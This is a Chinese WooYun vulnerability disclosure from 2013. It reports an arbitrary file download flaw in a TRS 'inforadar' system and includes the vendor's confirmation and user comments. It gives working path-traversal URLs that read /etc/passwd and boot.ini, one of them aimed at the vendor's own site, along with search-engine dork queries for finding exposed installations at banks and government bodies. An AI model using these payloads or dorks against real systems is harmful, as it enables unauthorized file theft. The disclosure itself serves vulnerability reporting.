当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040047

漏洞标题:trs某系统任意文件下载漏洞第二弹

相关厂商:北京拓尔思信息技术股份有限公司

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-17 14:37

修复时间:2014-01-15 14:37

公开时间:2014-01-15 14:37

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-21: 细节向第三方安全合作伙伴开放
2013-12-12: 细节向核心白帽子及相关领域专家公开
2013-12-22: 细节向普通白帽子公开
2014-01-01: 细节向实习白帽子公开
2014-01-15: 细节向公众公开

简要描述:

感觉挺严重的问题,存在的地方包括但是不局限银行、政府等行业。

详细说明:

exp
inforadar/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
exp2
http://inforadar.trs.com.cn/jsp/util/file_download.jsp?filePath=c:%5Cboot.ini%00.xml
官方网站需要加个截断,就可以了
应该是神马雷达系统。
很多地方都有这问题。
但是google找不到多少个,因为很多都是二次开发,目录明改变了。
比如招行。。。
WooYun: 招商银行某系统任意文件下载漏洞
google
http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:inforadar&start=10
http://203.208.46.145/#filter=0&newwindow=1&q=inurl:jsp/portalsearch
baidu
http://www.baidu.com/s?wd=inurl%3Ainforadar&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=13&rsv_sug=0&rsv_sug1=12&rsv_sug4=777

漏洞证明:

WooYun: 招商银行某系统任意文件下载漏洞
WooYun: 福建省人民政府某系统任意文件下载漏洞
trs官方

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


貌似windows的boot.ini都一样 官方用的是2003系统。。

修复方案:

正则过滤下呗,然后限制下访问文件类型。

版权声明:转载请注明来源 想要减肥的胖纸@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2013-10-18 09:29

厂商回复:

感谢您的支持,该漏洞在产品的前一版本已经修复,相关应用系统及用户单位我们会及时核查更新。
*** 安全无止境,我们一直在努力! ***

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-17 15:50 | cyber_jt ( 实习白帽子 | Rank:65 漏洞数:14 | goventkiller)

    关注,这几天遇到很多TRS系统。

  2. 2013-10-17 19:29 | 鶆鶈 ( 普通白帽子 | Rank:306 漏洞数:30 )

    mof,moc,fmprc...求日~哦也!

  3. 2013-10-17 21:57 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @鶆鶈 www.gov.cn 求日

  4. 2013-10-18 11:46 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    trs给的rank太低了。唉。

  5. 2013-10-18 12:35 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    或许是出于商业目的,担心被竞争对手恶意诋毁,所以产品再严重的问题,也不能“自乱阵脚”给一个高的rank值,授人以“把柄”。不过@鶆鶈 @想要减肥的胖纸 “厂商活动”里面不是给你们发送礼物了么,或许可以平衡rank比较低的问题吧。*** 安全无止境,我们一直在努力! ***希望后半句如果能够做的实际一点

  6. 2013-10-18 12:35 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    或许是出于商业目的,担心被竞争对手恶意诋毁,所以产品再严重的问题,也不能“自乱阵脚”给一个高的rank值,授人以“把柄”。不过@鶆鶈 @想要减肥的胖纸 “厂商活动”里面不是给你们发送礼物了么,或许可以平衡rank比较低的问题吧。*** 安全无止境,我们一直在努力! ***希望后半句如果能够做的实际一点